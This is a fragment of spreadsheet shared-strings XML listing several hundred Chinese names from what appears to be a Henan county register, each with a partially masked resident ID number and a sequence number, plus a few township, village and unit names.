  <si>
    <t>赵如贤</t>
  </si>
  <si>
    <t>412921********208X</t>
  </si>
  <si>
    <t>1756</t>
  </si>
  <si>
    <t>邱丰祥</t>
  </si>
  <si>
    <t>412921********2038</t>
  </si>
  <si>
    <t>1757</t>
  </si>
  <si>
    <t>魏书芳</t>
  </si>
  <si>
    <t>412921********2023</t>
  </si>
  <si>
    <t>1758</t>
  </si>
  <si>
    <t>张国凤</t>
  </si>
  <si>
    <t>412921********2048</t>
  </si>
  <si>
    <t>1759</t>
  </si>
  <si>
    <t>412921********202X</t>
  </si>
  <si>
    <t>1760</t>
  </si>
  <si>
    <t>刘建伟</t>
  </si>
  <si>
    <t>412921********2033</t>
  </si>
  <si>
    <t>1761</t>
  </si>
  <si>
    <t>乔运发</t>
  </si>
  <si>
    <t>412921********2017</t>
  </si>
  <si>
    <t>1762</t>
  </si>
  <si>
    <t>段召甫</t>
  </si>
  <si>
    <t>1763</t>
  </si>
  <si>
    <t>李好</t>
  </si>
  <si>
    <t>412921********2026</t>
  </si>
  <si>
    <t>1764</t>
  </si>
  <si>
    <t>刘香琴</t>
  </si>
  <si>
    <t>412921********2063</t>
  </si>
  <si>
    <t>1765</t>
  </si>
  <si>
    <t>石教明</t>
  </si>
  <si>
    <t>412921********2051</t>
  </si>
  <si>
    <t>1766</t>
  </si>
  <si>
    <t>段召宾</t>
  </si>
  <si>
    <t>412921********2010</t>
  </si>
  <si>
    <t>1767</t>
  </si>
  <si>
    <t>张运朝</t>
  </si>
  <si>
    <t>412921********2032</t>
  </si>
  <si>
    <t>1768</t>
  </si>
  <si>
    <t>卫洪信</t>
  </si>
  <si>
    <t>412921********2018</t>
  </si>
  <si>
    <t>1769</t>
  </si>
  <si>
    <t>王书芝</t>
  </si>
  <si>
    <t>412921********2045</t>
  </si>
  <si>
    <t>1770</t>
  </si>
  <si>
    <t>卫洪庆</t>
  </si>
  <si>
    <t>412921********2052</t>
  </si>
  <si>
    <t>1771</t>
  </si>
  <si>
    <t>李巧</t>
  </si>
  <si>
    <t>412921********4028</t>
  </si>
  <si>
    <t>1772</t>
  </si>
  <si>
    <t>任保军</t>
  </si>
  <si>
    <t>412921********2014</t>
  </si>
  <si>
    <t>1773</t>
  </si>
  <si>
    <t>段庆红</t>
  </si>
  <si>
    <t>1774</t>
  </si>
  <si>
    <t>乔国珍</t>
  </si>
  <si>
    <t>412921********2037</t>
  </si>
  <si>
    <t>1775</t>
  </si>
  <si>
    <t>肖爱花</t>
  </si>
  <si>
    <t>412921********2027</t>
  </si>
  <si>
    <t>1776</t>
  </si>
  <si>
    <t>刘中原</t>
  </si>
  <si>
    <t>1777</t>
  </si>
  <si>
    <t>司金花</t>
  </si>
  <si>
    <t>412921********2089</t>
  </si>
  <si>
    <t>1778</t>
  </si>
  <si>
    <t>朱洪来</t>
  </si>
  <si>
    <t>1779</t>
  </si>
  <si>
    <t>邱喜转</t>
  </si>
  <si>
    <t>412921********2085</t>
  </si>
  <si>
    <t>1780</t>
  </si>
  <si>
    <t>1781</t>
  </si>
  <si>
    <t>马桂勤</t>
  </si>
  <si>
    <t>412921********2024</t>
  </si>
  <si>
    <t>1782</t>
  </si>
  <si>
    <t>刘金太</t>
  </si>
  <si>
    <t>1783</t>
  </si>
  <si>
    <t>朱清芝</t>
  </si>
  <si>
    <t>412921********204X</t>
  </si>
  <si>
    <t>1784</t>
  </si>
  <si>
    <t>卫天秀</t>
  </si>
  <si>
    <t>412921********2012</t>
  </si>
  <si>
    <t>1785</t>
  </si>
  <si>
    <t>朱齐玲</t>
  </si>
  <si>
    <t>1786</t>
  </si>
  <si>
    <t>段庆才</t>
  </si>
  <si>
    <t>412921********207X</t>
  </si>
  <si>
    <t>1787</t>
  </si>
  <si>
    <t>潘素玲</t>
  </si>
  <si>
    <t>412921********2044</t>
  </si>
  <si>
    <t>1788</t>
  </si>
  <si>
    <t>胡松奇</t>
  </si>
  <si>
    <t>412921********2056</t>
  </si>
  <si>
    <t>1789</t>
  </si>
  <si>
    <t>刘金香</t>
  </si>
  <si>
    <t>412921********2540</t>
  </si>
  <si>
    <t>1790</t>
  </si>
  <si>
    <t>殷书春</t>
  </si>
  <si>
    <t>412921********2050</t>
  </si>
  <si>
    <t>1791</t>
  </si>
  <si>
    <t>段庆先</t>
  </si>
  <si>
    <t>412921********2060</t>
  </si>
  <si>
    <t>1792</t>
  </si>
  <si>
    <t>刘金兰</t>
  </si>
  <si>
    <t>1793</t>
  </si>
  <si>
    <t>刘运军</t>
  </si>
  <si>
    <t>412921********2016</t>
  </si>
  <si>
    <t>1794</t>
  </si>
  <si>
    <t>卫天强</t>
  </si>
  <si>
    <t>412921********2013</t>
  </si>
  <si>
    <t>1795</t>
  </si>
  <si>
    <t>闫俊敏</t>
  </si>
  <si>
    <t>412921********2069</t>
  </si>
  <si>
    <t>1796</t>
  </si>
  <si>
    <t>段庆万</t>
  </si>
  <si>
    <t>1797</t>
  </si>
  <si>
    <t>412921********2040</t>
  </si>
  <si>
    <t>1798</t>
  </si>
  <si>
    <t>李国兰</t>
  </si>
  <si>
    <t>412921********2025</t>
  </si>
  <si>
    <t>1799</t>
  </si>
  <si>
    <t>朱佳琳</t>
  </si>
  <si>
    <t>411326********2029</t>
  </si>
  <si>
    <t>1800</t>
  </si>
  <si>
    <t>段庆亮</t>
  </si>
  <si>
    <t>412921********2011</t>
  </si>
  <si>
    <t>1801</t>
  </si>
  <si>
    <t>陈明会</t>
  </si>
  <si>
    <t>412921********2029</t>
  </si>
  <si>
    <t>1802</t>
  </si>
  <si>
    <t>朱荣梅</t>
  </si>
  <si>
    <t>412921********2028</t>
  </si>
  <si>
    <t>1803</t>
  </si>
  <si>
    <t>朱洪军</t>
  </si>
  <si>
    <t>412921********2034</t>
  </si>
  <si>
    <t>1804</t>
  </si>
  <si>
    <t>袁金华</t>
  </si>
  <si>
    <t>1805</t>
  </si>
  <si>
    <t>段召玲</t>
  </si>
  <si>
    <t>1806</t>
  </si>
  <si>
    <t>徐付营</t>
  </si>
  <si>
    <t>411321********2023</t>
  </si>
  <si>
    <t>1807</t>
  </si>
  <si>
    <t>段庆成</t>
  </si>
  <si>
    <t>1808</t>
  </si>
  <si>
    <t>王华</t>
  </si>
  <si>
    <t>412921********2066</t>
  </si>
  <si>
    <t>1809</t>
  </si>
  <si>
    <t>袁福国</t>
  </si>
  <si>
    <t>1810</t>
  </si>
  <si>
    <t>马希勤</t>
  </si>
  <si>
    <t>1811</t>
  </si>
  <si>
    <t>乔花青</t>
  </si>
  <si>
    <t>412921********2081</t>
  </si>
  <si>
    <t>1812</t>
  </si>
  <si>
    <t>王永志</t>
  </si>
  <si>
    <t>1813</t>
  </si>
  <si>
    <t>张桂玲</t>
  </si>
  <si>
    <t>412921********2043</t>
  </si>
  <si>
    <t>1814</t>
  </si>
  <si>
    <t>袁天宝</t>
  </si>
  <si>
    <t>412921********2036</t>
  </si>
  <si>
    <t>1815</t>
  </si>
  <si>
    <t>胡国云</t>
  </si>
  <si>
    <t>1816</t>
  </si>
  <si>
    <t>张广先</t>
  </si>
  <si>
    <t>1817</t>
  </si>
  <si>
    <t>殷金玲</t>
  </si>
  <si>
    <t>412921********2047</t>
  </si>
  <si>
    <t>1818</t>
  </si>
  <si>
    <t>牛金瑞</t>
  </si>
  <si>
    <t>1819</t>
  </si>
  <si>
    <t>朱清德</t>
  </si>
  <si>
    <t>412921********2039</t>
  </si>
  <si>
    <t>1820</t>
  </si>
  <si>
    <t>陈广娥</t>
  </si>
  <si>
    <t>1821</t>
  </si>
  <si>
    <t>李永银</t>
  </si>
  <si>
    <t>1822</t>
  </si>
  <si>
    <t>段召记</t>
  </si>
  <si>
    <t>1823</t>
  </si>
  <si>
    <t>张文芝</t>
  </si>
  <si>
    <t>1824</t>
  </si>
  <si>
    <t>曹付国</t>
  </si>
  <si>
    <t>412921********2035</t>
  </si>
  <si>
    <t>1825</t>
  </si>
  <si>
    <t>袁斌宏</t>
  </si>
  <si>
    <t>1826</t>
  </si>
  <si>
    <t>段庆强</t>
  </si>
  <si>
    <t>1827</t>
  </si>
  <si>
    <t>袁海燕</t>
  </si>
  <si>
    <t>1828</t>
  </si>
  <si>
    <t>邱向东</t>
  </si>
  <si>
    <t>1829</t>
  </si>
  <si>
    <t>张国如</t>
  </si>
  <si>
    <t>412921********2021</t>
  </si>
  <si>
    <t>1830</t>
  </si>
  <si>
    <t>邱喜成</t>
  </si>
  <si>
    <t>412921********2074</t>
  </si>
  <si>
    <t>1831</t>
  </si>
  <si>
    <t>李国玲</t>
  </si>
  <si>
    <t>1832</t>
  </si>
  <si>
    <t>常开路</t>
  </si>
  <si>
    <t>1833</t>
  </si>
  <si>
    <t>卫天勤</t>
  </si>
  <si>
    <t>1834</t>
  </si>
  <si>
    <t>魏敏</t>
  </si>
  <si>
    <t>1835</t>
  </si>
  <si>
    <t>卫金华</t>
  </si>
  <si>
    <t>1836</t>
  </si>
  <si>
    <t>申庆丽</t>
  </si>
  <si>
    <t>1837</t>
  </si>
  <si>
    <t>邱海清</t>
  </si>
  <si>
    <t>412921********2053</t>
  </si>
  <si>
    <t>1838</t>
  </si>
  <si>
    <t>康俊坡</t>
  </si>
  <si>
    <t>412921********203X</t>
  </si>
  <si>
    <t>1839</t>
  </si>
  <si>
    <t>袁爱云</t>
  </si>
  <si>
    <t>1840</t>
  </si>
  <si>
    <t>段召贵</t>
  </si>
  <si>
    <t>1841</t>
  </si>
  <si>
    <t>刘玉梅</t>
  </si>
  <si>
    <t>1842</t>
  </si>
  <si>
    <t>段庆生</t>
  </si>
  <si>
    <t>1843</t>
  </si>
  <si>
    <t>高金凤</t>
  </si>
  <si>
    <t>1844</t>
  </si>
  <si>
    <t>段庆安</t>
  </si>
  <si>
    <t>1845</t>
  </si>
  <si>
    <t>412921********2068</t>
  </si>
  <si>
    <t>1846</t>
  </si>
  <si>
    <t>刘长波</t>
  </si>
  <si>
    <t>1847</t>
  </si>
  <si>
    <t>任桂云</t>
  </si>
  <si>
    <t>1848</t>
  </si>
  <si>
    <t>曹喜安</t>
  </si>
  <si>
    <t>1849</t>
  </si>
  <si>
    <t>1850</t>
  </si>
  <si>
    <t>訾华</t>
  </si>
  <si>
    <t>410423********4025</t>
  </si>
  <si>
    <t>1851</t>
  </si>
  <si>
    <t>刘闪娜</t>
  </si>
  <si>
    <t>411326********2025</t>
  </si>
  <si>
    <t>1852</t>
  </si>
  <si>
    <t>曹帅</t>
  </si>
  <si>
    <t>1853</t>
  </si>
  <si>
    <t>卫天玉</t>
  </si>
  <si>
    <t>412921********2059</t>
  </si>
  <si>
    <t>1854</t>
  </si>
  <si>
    <t>李成珍</t>
  </si>
  <si>
    <t>412921********2049</t>
  </si>
  <si>
    <t>1855</t>
  </si>
  <si>
    <t>袁金玉</t>
  </si>
  <si>
    <t>412921********2030</t>
  </si>
  <si>
    <t>1856</t>
  </si>
  <si>
    <t>任金花</t>
  </si>
  <si>
    <t>412921********2106</t>
  </si>
  <si>
    <t>1857</t>
  </si>
  <si>
    <t>刘运杰</t>
  </si>
  <si>
    <t>412921********2071</t>
  </si>
  <si>
    <t>1858</t>
  </si>
  <si>
    <t>朱洪花</t>
  </si>
  <si>
    <t>1859</t>
  </si>
  <si>
    <t>袁金玲</t>
  </si>
  <si>
    <t>1860</t>
  </si>
  <si>
    <t>张天阁</t>
  </si>
  <si>
    <t>1861</t>
  </si>
  <si>
    <t>袁金会</t>
  </si>
  <si>
    <t>1862</t>
  </si>
  <si>
    <t>朱国成</t>
  </si>
  <si>
    <t>412921********2076</t>
  </si>
  <si>
    <t>1863</t>
  </si>
  <si>
    <t>袁天平</t>
  </si>
  <si>
    <t>412921********2046</t>
  </si>
  <si>
    <t>1864</t>
  </si>
  <si>
    <t>乔振东</t>
  </si>
  <si>
    <t>1865</t>
  </si>
  <si>
    <t>伍延兰</t>
  </si>
  <si>
    <t>1866</t>
  </si>
  <si>
    <t>任保海</t>
  </si>
  <si>
    <t>412921********2015</t>
  </si>
  <si>
    <t>1867</t>
  </si>
  <si>
    <t>李四营</t>
  </si>
  <si>
    <t>1868</t>
  </si>
  <si>
    <t>任金亮</t>
  </si>
  <si>
    <t>1869</t>
  </si>
  <si>
    <t>刘运芝</t>
  </si>
  <si>
    <t>1870</t>
  </si>
  <si>
    <t>乔国勇</t>
  </si>
  <si>
    <t>1871</t>
  </si>
  <si>
    <t>冯树勤</t>
  </si>
  <si>
    <t>1872</t>
  </si>
  <si>
    <t>卫金生</t>
  </si>
  <si>
    <t>1873</t>
  </si>
  <si>
    <t>姜云焕</t>
  </si>
  <si>
    <t>412921********2428</t>
  </si>
  <si>
    <t>1874</t>
  </si>
  <si>
    <t>曹付生</t>
  </si>
  <si>
    <t>1875</t>
  </si>
  <si>
    <t>刘广敏</t>
  </si>
  <si>
    <t>1876</t>
  </si>
  <si>
    <t>张春朝</t>
  </si>
  <si>
    <t>1877</t>
  </si>
  <si>
    <t>刘玉先</t>
  </si>
  <si>
    <t>1878</t>
  </si>
  <si>
    <t>张予芊彤</t>
  </si>
  <si>
    <t>411321********2046</t>
  </si>
  <si>
    <t>1879</t>
  </si>
  <si>
    <t>王小浩</t>
  </si>
  <si>
    <t>412921********1110</t>
  </si>
  <si>
    <t>1880</t>
  </si>
  <si>
    <t>张广丽</t>
  </si>
  <si>
    <t>412921********1180</t>
  </si>
  <si>
    <t>1881</t>
  </si>
  <si>
    <t>曹春芝</t>
  </si>
  <si>
    <t>1882</t>
  </si>
  <si>
    <t>刘金海</t>
  </si>
  <si>
    <t>1883</t>
  </si>
  <si>
    <t>康真真</t>
  </si>
  <si>
    <t>411326********2061</t>
  </si>
  <si>
    <t>1884</t>
  </si>
  <si>
    <t>康徽</t>
  </si>
  <si>
    <t>411321********5277</t>
  </si>
  <si>
    <t>1885</t>
  </si>
  <si>
    <t>张有强</t>
  </si>
  <si>
    <t>1886</t>
  </si>
  <si>
    <t>段庆凤</t>
  </si>
  <si>
    <t>412921********2041</t>
  </si>
  <si>
    <t>1887</t>
  </si>
  <si>
    <t>张春青</t>
  </si>
  <si>
    <t>1888</t>
  </si>
  <si>
    <t>袁绪英</t>
  </si>
  <si>
    <t>1889</t>
  </si>
  <si>
    <t>曹春玲</t>
  </si>
  <si>
    <t>1890</t>
  </si>
  <si>
    <t>任保奇</t>
  </si>
  <si>
    <t>1891</t>
  </si>
  <si>
    <t>段兆君</t>
  </si>
  <si>
    <t>412921********2431</t>
  </si>
  <si>
    <t>1892</t>
  </si>
  <si>
    <t xml:space="preserve">郑小华  </t>
  </si>
  <si>
    <t>412921********2022</t>
  </si>
  <si>
    <t>1893</t>
  </si>
  <si>
    <t>段庆阳</t>
  </si>
  <si>
    <t>412921********2058</t>
  </si>
  <si>
    <t>1894</t>
  </si>
  <si>
    <t>朱清霞</t>
  </si>
  <si>
    <t>1895</t>
  </si>
  <si>
    <t>袁绪锋</t>
  </si>
  <si>
    <t>1896</t>
  </si>
  <si>
    <t>高书云</t>
  </si>
  <si>
    <t>1897</t>
  </si>
  <si>
    <t>杨明贵</t>
  </si>
  <si>
    <t>1898</t>
  </si>
  <si>
    <t>朱洪霞</t>
  </si>
  <si>
    <t>1899</t>
  </si>
  <si>
    <t>刘朱鑫</t>
  </si>
  <si>
    <t>411321********2024</t>
  </si>
  <si>
    <t>1900</t>
  </si>
  <si>
    <t>卫金中</t>
  </si>
  <si>
    <t>1901</t>
  </si>
  <si>
    <t>马延文</t>
  </si>
  <si>
    <t>1902</t>
  </si>
  <si>
    <t>曹付荣</t>
  </si>
  <si>
    <t>412921********2042</t>
  </si>
  <si>
    <t>1903</t>
  </si>
  <si>
    <t>卫金涛</t>
  </si>
  <si>
    <t>1904</t>
  </si>
  <si>
    <t>贺娜</t>
  </si>
  <si>
    <t>1905</t>
  </si>
  <si>
    <t>马延亮</t>
  </si>
  <si>
    <t>1906</t>
  </si>
  <si>
    <t>张保安</t>
  </si>
  <si>
    <t>1907</t>
  </si>
  <si>
    <t>张明华</t>
  </si>
  <si>
    <t>1908</t>
  </si>
  <si>
    <t>金霞</t>
  </si>
  <si>
    <t>412921********4428</t>
  </si>
  <si>
    <t>1909</t>
  </si>
  <si>
    <t>袁金龙</t>
  </si>
  <si>
    <t>1910</t>
  </si>
  <si>
    <t>袁文涛</t>
  </si>
  <si>
    <t>411321********6233</t>
  </si>
  <si>
    <t>1911</t>
  </si>
  <si>
    <t>邱喜梅</t>
  </si>
  <si>
    <t>1912</t>
  </si>
  <si>
    <t>文恒强</t>
  </si>
  <si>
    <t>412727********7472</t>
  </si>
  <si>
    <t>1913</t>
  </si>
  <si>
    <t>文静</t>
  </si>
  <si>
    <t>412727********7460</t>
  </si>
  <si>
    <t>1914</t>
  </si>
  <si>
    <t>訾延生</t>
  </si>
  <si>
    <t>412921********209X</t>
  </si>
  <si>
    <t>1915</t>
  </si>
  <si>
    <t>常丽</t>
  </si>
  <si>
    <t>411326********2047</t>
  </si>
  <si>
    <t>1916</t>
  </si>
  <si>
    <t>刘子芝</t>
  </si>
  <si>
    <t>411321********2027</t>
  </si>
  <si>
    <t>1917</t>
  </si>
  <si>
    <t>刘明嘉</t>
  </si>
  <si>
    <t>1918</t>
  </si>
  <si>
    <t>乔国娥</t>
  </si>
  <si>
    <t>1919</t>
  </si>
  <si>
    <t>刘立阳</t>
  </si>
  <si>
    <t>1920</t>
  </si>
  <si>
    <t>刘振方</t>
  </si>
  <si>
    <t>411326********2022</t>
  </si>
  <si>
    <t>1921</t>
  </si>
  <si>
    <t>张艺杭</t>
  </si>
  <si>
    <t>411322********293X</t>
  </si>
  <si>
    <t>1922</t>
  </si>
  <si>
    <t>张艺鑫</t>
  </si>
  <si>
    <t>411322********0085</t>
  </si>
  <si>
    <t>1923</t>
  </si>
  <si>
    <t>尚兰英</t>
  </si>
  <si>
    <t>1924</t>
  </si>
  <si>
    <t>王梅兰</t>
  </si>
  <si>
    <t>1925</t>
  </si>
  <si>
    <t>乔明卿</t>
  </si>
  <si>
    <t>1926</t>
  </si>
  <si>
    <t>殷金焕</t>
  </si>
  <si>
    <t>1927</t>
  </si>
  <si>
    <t>段庆玲</t>
  </si>
  <si>
    <t>412921********1141</t>
  </si>
  <si>
    <t>1928</t>
  </si>
  <si>
    <t>张琳琳</t>
  </si>
  <si>
    <t>411321********5967</t>
  </si>
  <si>
    <t>1929</t>
  </si>
  <si>
    <t>任金红</t>
  </si>
  <si>
    <t>1930</t>
  </si>
  <si>
    <t>牛娜</t>
  </si>
  <si>
    <t>411326********2041</t>
  </si>
  <si>
    <t>1931</t>
  </si>
  <si>
    <t>袁付巧</t>
  </si>
  <si>
    <t>1932</t>
  </si>
  <si>
    <t>袁天三</t>
  </si>
  <si>
    <t>1933</t>
  </si>
  <si>
    <t>王娥红</t>
  </si>
  <si>
    <t>1934</t>
  </si>
  <si>
    <t>刘广艳</t>
  </si>
  <si>
    <t>1935</t>
  </si>
  <si>
    <t>李仁跃</t>
  </si>
  <si>
    <t>1936</t>
  </si>
  <si>
    <t xml:space="preserve">李怡晨 </t>
  </si>
  <si>
    <t>411321********012X</t>
  </si>
  <si>
    <t>1937</t>
  </si>
  <si>
    <t>臧营</t>
  </si>
  <si>
    <t>412921********1603</t>
  </si>
  <si>
    <t>1938</t>
  </si>
  <si>
    <t>王玉芹</t>
  </si>
  <si>
    <t>1939</t>
  </si>
  <si>
    <t>段召兰</t>
  </si>
  <si>
    <t>1940</t>
  </si>
  <si>
    <t xml:space="preserve">曹满   </t>
  </si>
  <si>
    <t>411326********2071</t>
  </si>
  <si>
    <t>1941</t>
  </si>
  <si>
    <t>卫天丽</t>
  </si>
  <si>
    <t>1942</t>
  </si>
  <si>
    <t>尚广坤</t>
  </si>
  <si>
    <t>411321********2039</t>
  </si>
  <si>
    <t>1943</t>
  </si>
  <si>
    <t>卫金朝</t>
  </si>
  <si>
    <t>411326********2011</t>
  </si>
  <si>
    <t>1944</t>
  </si>
  <si>
    <t>张长运</t>
  </si>
  <si>
    <t>412921********2073</t>
  </si>
  <si>
    <t>1945</t>
  </si>
  <si>
    <t>袁绪旺</t>
  </si>
  <si>
    <t>1946</t>
  </si>
  <si>
    <t>高峰</t>
  </si>
  <si>
    <t>412921********1165</t>
  </si>
  <si>
    <t>1947</t>
  </si>
  <si>
    <t>张运花</t>
  </si>
  <si>
    <t>1948</t>
  </si>
  <si>
    <t>袁金长</t>
  </si>
  <si>
    <t>412921********2072</t>
  </si>
  <si>
    <t>1949</t>
  </si>
  <si>
    <t>乔国文</t>
  </si>
  <si>
    <t>1950</t>
  </si>
  <si>
    <t>张明珍</t>
  </si>
  <si>
    <t>412921********2205</t>
  </si>
  <si>
    <t>1951</t>
  </si>
  <si>
    <t>李长勉</t>
  </si>
  <si>
    <t>412921********2062</t>
  </si>
  <si>
    <t>1952</t>
  </si>
  <si>
    <t>张海玲</t>
  </si>
  <si>
    <t>1953</t>
  </si>
  <si>
    <t>邱小成</t>
  </si>
  <si>
    <t>412921********2110</t>
  </si>
  <si>
    <t>1954</t>
  </si>
  <si>
    <t>段明芝</t>
  </si>
  <si>
    <t>1955</t>
  </si>
  <si>
    <t>朱占君</t>
  </si>
  <si>
    <t>411326********2053</t>
  </si>
  <si>
    <t>1956</t>
  </si>
  <si>
    <t>刘金华</t>
  </si>
  <si>
    <t>1957</t>
  </si>
  <si>
    <t>任金东</t>
  </si>
  <si>
    <t>1958</t>
  </si>
  <si>
    <t>王梅英</t>
  </si>
  <si>
    <t>412921********2086</t>
  </si>
  <si>
    <t>1959</t>
  </si>
  <si>
    <t>柳花棉</t>
  </si>
  <si>
    <t>412922********136X</t>
  </si>
  <si>
    <t>1960</t>
  </si>
  <si>
    <t>朱启程</t>
  </si>
  <si>
    <t>411326********2018</t>
  </si>
  <si>
    <t>1961</t>
  </si>
  <si>
    <t>袁天刚</t>
  </si>
  <si>
    <t>1962</t>
  </si>
  <si>
    <t>张志伦</t>
  </si>
  <si>
    <t>1963</t>
  </si>
  <si>
    <t>袁绪霞</t>
  </si>
  <si>
    <t>1964</t>
  </si>
  <si>
    <t>乔永刚</t>
  </si>
  <si>
    <t>411326********2019</t>
  </si>
  <si>
    <t>1965</t>
  </si>
  <si>
    <t>尹玉兰</t>
  </si>
  <si>
    <t>412921********2065</t>
  </si>
  <si>
    <t>1966</t>
  </si>
  <si>
    <t>袁源</t>
  </si>
  <si>
    <t>411326********2024</t>
  </si>
  <si>
    <t>1967</t>
  </si>
  <si>
    <t>王浩然</t>
  </si>
  <si>
    <t>411321********0094</t>
  </si>
  <si>
    <t>1968</t>
  </si>
  <si>
    <t>王煜佳</t>
  </si>
  <si>
    <t>411321********2885</t>
  </si>
  <si>
    <t>1969</t>
  </si>
  <si>
    <t>王致远</t>
  </si>
  <si>
    <t>1970</t>
  </si>
  <si>
    <t>袁小瑞</t>
  </si>
  <si>
    <t>1971</t>
  </si>
  <si>
    <t>袁付平</t>
  </si>
  <si>
    <t>1972</t>
  </si>
  <si>
    <t>乔振才</t>
  </si>
  <si>
    <t>1973</t>
  </si>
  <si>
    <t>朱清花</t>
  </si>
  <si>
    <t>1974</t>
  </si>
  <si>
    <t>袁天才</t>
  </si>
  <si>
    <t>1975</t>
  </si>
  <si>
    <t>邱喜朵</t>
  </si>
  <si>
    <t>1976</t>
  </si>
  <si>
    <t>段庆娥</t>
  </si>
  <si>
    <t>1977</t>
  </si>
  <si>
    <t>袁周来</t>
  </si>
  <si>
    <t>1978</t>
  </si>
  <si>
    <t>段庆明</t>
  </si>
  <si>
    <t>412921********2179</t>
  </si>
  <si>
    <t>1979</t>
  </si>
  <si>
    <t>尚小燕</t>
  </si>
  <si>
    <t>411326********204X</t>
  </si>
  <si>
    <t>1980</t>
  </si>
  <si>
    <t>胡朝君</t>
  </si>
  <si>
    <t>411321********5958</t>
  </si>
  <si>
    <t>1981</t>
  </si>
  <si>
    <t>杨建云</t>
  </si>
  <si>
    <t>1982</t>
  </si>
  <si>
    <t>方运杰</t>
  </si>
  <si>
    <t>1983</t>
  </si>
  <si>
    <t>景淑兰</t>
  </si>
  <si>
    <t>1984</t>
  </si>
  <si>
    <t>孙俊</t>
  </si>
  <si>
    <t>1985</t>
  </si>
  <si>
    <t>陈秀勉</t>
  </si>
  <si>
    <t>1986</t>
  </si>
  <si>
    <t>赵书彬</t>
  </si>
  <si>
    <t>411326********2010</t>
  </si>
  <si>
    <t>1987</t>
  </si>
  <si>
    <t>赵书晗</t>
  </si>
  <si>
    <t>411321********202X</t>
  </si>
  <si>
    <t>1988</t>
  </si>
  <si>
    <t>马延玉</t>
  </si>
  <si>
    <t>1989</t>
  </si>
  <si>
    <t>张道霞</t>
  </si>
  <si>
    <t>1990</t>
  </si>
  <si>
    <t>卫金超</t>
  </si>
  <si>
    <t>411326********2015</t>
  </si>
  <si>
    <t>1991</t>
  </si>
  <si>
    <t>任丰娟</t>
  </si>
  <si>
    <t>411326********2045</t>
  </si>
  <si>
    <t>1992</t>
  </si>
  <si>
    <t>卫凤萱</t>
  </si>
  <si>
    <t>411321********2247</t>
  </si>
  <si>
    <t>1993</t>
  </si>
  <si>
    <t>乔洪卿</t>
  </si>
  <si>
    <t>1994</t>
  </si>
  <si>
    <t>张秋英</t>
  </si>
  <si>
    <t>1995</t>
  </si>
  <si>
    <t>袁斌勤</t>
  </si>
  <si>
    <t>1996</t>
  </si>
  <si>
    <t>杨付英</t>
  </si>
  <si>
    <t>1997</t>
  </si>
  <si>
    <t>段庆勤</t>
  </si>
  <si>
    <t>1998</t>
  </si>
  <si>
    <t>李丰先</t>
  </si>
  <si>
    <t>1999</t>
  </si>
  <si>
    <t>袁秀昱</t>
  </si>
  <si>
    <t>411321********0206</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>宁文英</t>
  </si>
  <si>
    <t>2001</t>
  </si>
  <si>
    <t>段庆贵</t>
  </si>
  <si>
    <t>2002</t>
  </si>
  <si>
    <t>邱海中</t>
  </si>
  <si>
    <t>2003</t>
  </si>
  <si>
    <t>邱海亮</t>
  </si>
  <si>
    <t>2004</t>
  </si>
  <si>
    <t>袁斌虎</t>
  </si>
  <si>
    <t>2005</t>
  </si>
  <si>
    <t>教育局</t>
  </si>
  <si>
    <t>黄金保</t>
  </si>
  <si>
    <t>4113210699</t>
  </si>
  <si>
    <t>2006</t>
  </si>
  <si>
    <t>商业中心</t>
  </si>
  <si>
    <t>文建军</t>
  </si>
  <si>
    <t>2007</t>
  </si>
  <si>
    <t>县社</t>
  </si>
  <si>
    <t>卫光明</t>
  </si>
  <si>
    <t>2008</t>
  </si>
  <si>
    <t>王炳娥</t>
  </si>
  <si>
    <t>2009</t>
  </si>
  <si>
    <t>皇后乡宏扬居委会</t>
  </si>
  <si>
    <t>曹付军</t>
  </si>
  <si>
    <t>2010</t>
  </si>
  <si>
    <t>范国敏</t>
  </si>
  <si>
    <t>412921********2100</t>
  </si>
  <si>
    <t>2011</t>
  </si>
  <si>
    <t>王胜利</t>
  </si>
  <si>
    <t>2012</t>
  </si>
  <si>
    <t>太山庙乡</t>
  </si>
  <si>
    <t>毛庄村</t>
  </si>
  <si>
    <t>宋海云</t>
  </si>
  <si>
    <t>412921********2423</t>
  </si>
  <si>
    <t>2013</t>
  </si>
  <si>
    <t>张宗玉</t>
  </si>
  <si>
    <t>2014</t>
  </si>
  <si>
    <t>张明林</t>
  </si>
  <si>
    <t>412921********2455</t>
  </si>
  <si>
    <t>2015</t>
  </si>
  <si>
    <t>王申聚</t>
  </si>
  <si>
    <t>412921********2418</t>
  </si>
  <si>
    <t>2016</t>
  </si>
  <si>
    <t>王申志</t>
  </si>
  <si>
    <t>2017</t>
  </si>
  <si>
    <t>潘希九</t>
  </si>
  <si>
    <t>412921********2438</t>
  </si>
  <si>
    <t>2018</t>
  </si>
  <si>
    <t>张文奇</t>
  </si>
  <si>
    <t>412921********2458</t>
  </si>
  <si>
    <t>2019</t>
  </si>
  <si>
    <t>张桂梅</t>
  </si>
  <si>
    <t>412921********2442</t>
  </si>
  <si>
    <t>2020</t>
  </si>
  <si>
    <t>张雅钧</t>
  </si>
  <si>
    <t>411321********2440</t>
  </si>
  <si>
    <t>2021</t>
  </si>
  <si>
    <t>王春芳</t>
  </si>
  <si>
    <t>412921********2427</t>
  </si>
  <si>
    <t>2022</t>
  </si>
  <si>
    <t>王树森</t>
  </si>
  <si>
    <t>2023</t>
  </si>
  <si>
    <t>马先梅</t>
  </si>
  <si>
    <t>412921********2425</t>
  </si>
  <si>
    <t>2024</t>
  </si>
  <si>
    <t>杨金兰</t>
  </si>
  <si>
    <t>2025</t>
  </si>
  <si>
    <t>李文芝</t>
  </si>
  <si>
    <t>412921********2448</t>
  </si>
  <si>
    <t>2026</t>
  </si>
  <si>
    <t>杨怀芳</t>
  </si>
  <si>
    <t>2027</t>
  </si>
  <si>
    <t>李付荣</t>
  </si>
  <si>
    <t>2028</t>
  </si>
  <si>
    <t>冯金停</t>
  </si>
  <si>
    <t>412921********2451</t>
  </si>
  <si>
    <t>2029</t>
  </si>
  <si>
    <t>王志安</t>
  </si>
  <si>
    <t>412921********2435</t>
  </si>
  <si>
    <t>2030</t>
  </si>
  <si>
    <t>王运生</t>
  </si>
  <si>
    <t>412921********2433</t>
  </si>
  <si>
    <t>2031</t>
  </si>
  <si>
    <t>赵德英</t>
  </si>
  <si>
    <t>412921********244X</t>
  </si>
  <si>
    <t>2032</t>
  </si>
  <si>
    <t>牛青月</t>
  </si>
  <si>
    <t>2033</t>
  </si>
  <si>
    <t>张付琴</t>
  </si>
  <si>
    <t>412921********2429</t>
  </si>
  <si>
    <t>2034</t>
  </si>
  <si>
    <t>张玉芳</t>
  </si>
  <si>
    <t>412921********2439</t>
